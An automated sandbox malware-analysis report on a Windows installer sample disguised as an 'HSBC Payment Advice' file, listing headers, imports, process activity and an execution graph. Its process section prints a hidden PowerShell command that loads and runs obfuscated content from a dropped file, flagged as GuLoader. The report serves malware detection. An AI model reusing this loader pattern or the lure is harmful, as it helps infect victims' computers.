        mov dword ptr [004291E0h], eax
        mov eax, ebx
        jne 00007FAC04E7F51Ah
        push 00000022h
        mov eax, 00434002h
        pop esi
        push esi
        push eax
        call 00007FAC04E81A76h
        push eax
        call dword ptr [00407240h]
        mov dword ptr [esp+18h], eax
        jmp 00007FAC04E7F5DEh
        push 00000020h
        pop edx
        cmp cx, dx
        jne 00007FAC04E7F519h
        inc eax
        inc eax
        cmp word ptr [eax], dx
        je 00007FAC04E7F50Bh
        add word ptr [eax], 0000h

        Rich Headers

        Programming Language:
        • [EXP] VC++ 6.0 SP5 build 8804

        Data Directories

        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x480000x2d9f0.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

        Sections

        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000x5e660x6000e8f12472e91b02deb619070e6ee7f1f4False0.6566569010416666data6.419409887460116IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .data0x90000x202d80x600a5ec1b720d350c6303a7aba8d85072bfFalse0.4733072916666667data3.7600484096214832IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .ndata0x2a0000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rsrc0x480000x2d9f00x2da007af8bc69303ad1632e4b4b11332b9a00False0.2853863441780822data5.311136424558202IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

        Resources

        NameRVASizeTypeLanguageCountryZLIB Complexity
        RT_ICON0x483880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.13396131550928664
        RT_ICON0x58bb00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.18375551818372923
        RT_ICON0x620580x5519PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9949506541198072
        RT_ICON0x675780x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.21658964879852124
        RT_ICON0x6ca000x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.21268304204062352
        RT_ICON0x70c280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.2842323651452282
        RT_ICON0x731d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.35154784240150094
        RT_ICON0x742780x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.45819672131147543
        RT_ICON0x74c000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5576241134751773
        RT_DIALOG0x750680x100dataEnglishUnited States0.5234375
        RT_DIALOG0x751680x11cdataEnglishUnited States0.6056338028169014
        RT_DIALOG0x752880xc4dataEnglishUnited States0.5918367346938775
        RT_DIALOG0x753500x60dataEnglishUnited States0.7291666666666666
        RT_GROUP_ICON0x753b00x84dataEnglishUnited States0.7272727272727273
        RT_VERSION0x754380x2b0dataEnglishUnited States0.5101744186046512
        RT_MANIFEST0x756e80x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984

        Imports

        DLLImport
        KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
        USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
        ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
        ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
        VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

        Possible Origin

        Language of compilation systemCountry where language is spokenMap
        EnglishUnited States

        Network Behavior

        No network behavior found

        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        Behavior

        Click to jump to process

        System Behavior

        General

        Target ID:0
        Start time:05:16:38
        Start date:14/10/2024
        Path:C:\Users\user\Desktop\HSBC Payment Advice.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\Desktop\HSBC Payment Advice.exe"
        Imagebase:0x400000
        File size:879'498 bytes
        MD5 hash:B9138CEF86A6C7324BEC281BB7FA3E00
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        General

        Target ID:2
        Start time:05:16:39
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):true
        Commandline:"powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) "
        Imagebase:0x6c0000
        File size:433'152 bytes
        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.91928114130.0000000008F22000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
        Reputation:high
        Has exited:false

        General

        Target ID:3
        Start time:05:16:39
        Start date:14/10/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff6afa90000
        File size:875'008 bytes
        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        General

        Target ID:4
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:5
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:6
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        General

        Target ID:7
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:8
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:9
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:10
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:11
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:12
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:13
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:14
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:15
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:16
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:17
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:18
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:19
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:20
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:21
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:22
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:23
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:24
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:25
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:26
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:27
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:28
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:29
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:30
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:31
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:32
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:33
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:34
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:35
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:36
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:37
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:38
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:39
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:40
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:41
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Disassembly

        Reset < >

          Execution Graph

          Execution Coverage:20.8%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:21.6%
          Total number of Nodes:1279
          Total number of Limit Nodes:27
          execution_graph 2964 4037c0 2965 4037d1 CloseHandle 2964->2965 2966 4037db 2964->2966 2965->2966 2967 4037e5 CloseHandle 2966->2967 2968 4037ef 2966->2968 2967->2968 2973 40381d 2968->2973 2974 40382b 2973->2974 2975 403830 FreeLibrary GlobalFree 2974->2975 2976 4037f4 2974->2976 2975->2975 2975->2976 2977 405770 2976->2977 3013 405a3b 2977->3013 2980 405798 DeleteFileW 2987 403800 2980->2987 2981 4057af 2983 4058cf 2981->2983 3027 405ee8 lstrcpynW 2981->3027 2983->2987 3057 40622b FindFirstFileW 2983->3057 2984 4057d5 2985 4057e8 2984->2985 2986 4057db lstrcatW 2984->2986 3028 40597f lstrlenW 2985->3028 2988 4057ee 2986->2988 2991 4057fe lstrcatW 2988->2991 2993 405809 lstrlenW FindFirstFileW 2988->2993 2991->2993 2993->2983 3011 40582b 2993->3011 2996 4058b2 FindNextFileW 3000 4058c8 FindClose 2996->3000 2996->3011 2997 405728 5 API calls 2999 40590a 2997->2999 3001 405924 2999->3001 3002 40590e 2999->3002 3000->2983 3004 405192 25 API calls 3001->3004 3002->2987 3006 405192 25 API calls 3002->3006 3004->2987 3005 405770 64 API calls 3005->3011 3007 40591b 3006->3007 3008 405d82 40 API calls 3007->3008 3008->2987 3009 405192 25 API calls 3009->2996 3011->2996 3011->3005 3011->3009 3032 405ee8 lstrcpynW 3011->3032 3033 405728 3011->3033 3041 405192 3011->3041 3052 405d82 3011->3052 3063 405ee8 lstrcpynW 3013->3063 3015 405a4c 3064 4059de CharNextW CharNextW 3015->3064 3018 405790 3018->2980 3018->2981 3020 405a93 lstrlenW 3021 405a9e 3020->3021 3025 405a62 3020->3025 3022 405933 3 API calls 3021->3022 3024 405aa3 GetFileAttributesW 3022->3024 3023 40622b 2 API calls 3023->3025 3024->3018 3025->3018 3025->3020 3025->3023 3026 40597f 2 API calls 3025->3026 3026->3020 3027->2984 3029 40598d 3028->3029 3030 405993 CharPrevW 3029->3030 3031 40599f 3029->3031 3030->3029 3030->3031 3031->2988 3032->3011 3083 405b2f GetFileAttributesW 3033->3083 3036 405755 3036->3011 3037 405743 RemoveDirectoryW 3039 405751 3037->3039 3038 40574b DeleteFileW 3038->3039 3039->3036 3040 405761 SetFileAttributesW 3039->3040 3040->3036 3042 4051ad 3041->3042 3051 40524f 3041->3051 3043 4051c9 lstrlenW 3042->3043 3086 405f0a 3042->3086 3045 4051f2 3043->3045 3046 4051d7 lstrlenW 3043->3046 3048 405205 3045->3048 3049 4051f8 SetWindowTextW 3045->3049 3047 4051e9 lstrcatW 3046->3047 3046->3051 3047->3045 3050 40520b SendMessageW SendMessageW SendMessageW 3048->3050 3048->3051 3049->3048 3050->3051 3051->3011 3112 406252 GetModuleHandleA 3052->3112 3056 405daa 3056->3011 3058 406241 FindClose 3057->3058 3059 4058f4 3057->3059 3058->3059 3059->2987 3060 405933 lstrlenW CharPrevW 3059->3060 3061 4058fe 3060->3061 3062 40594f lstrcatW 3060->3062 3061->2997 3062->3061 3063->3015 3065 4059fb 3064->3065 3066 405a0d 3064->3066 3065->3066 3067 405a08 CharNextW 3065->3067 3069 405a31 3066->3069 3079 405960 3066->3079 3067->3069 3069->3018 3070 40617c 3069->3070 3076 406189 3070->3076 3071 406204 CharPrevW 3074 4061ff 3071->3074 3072 4061f2 CharNextW 3072->3074 3072->3076 3073 405960 CharNextW 3073->3076 3074->3071 3075 406225 3074->3075 3075->3025 3076->3072 3076->3073 3076->3074 3077 4061de CharNextW 3076->3077 3078 4061ed CharNextW 3076->3078 3077->3076 3078->3072 3080 405966 3079->3080 3081 40597c 3080->3081 3082 40596d CharNextW 3080->3082 3081->3066 3082->3080 3084 405b41 SetFileAttributesW 3083->3084 3085 405734 3083->3085 3084->3085 3085->3036 3085->3037 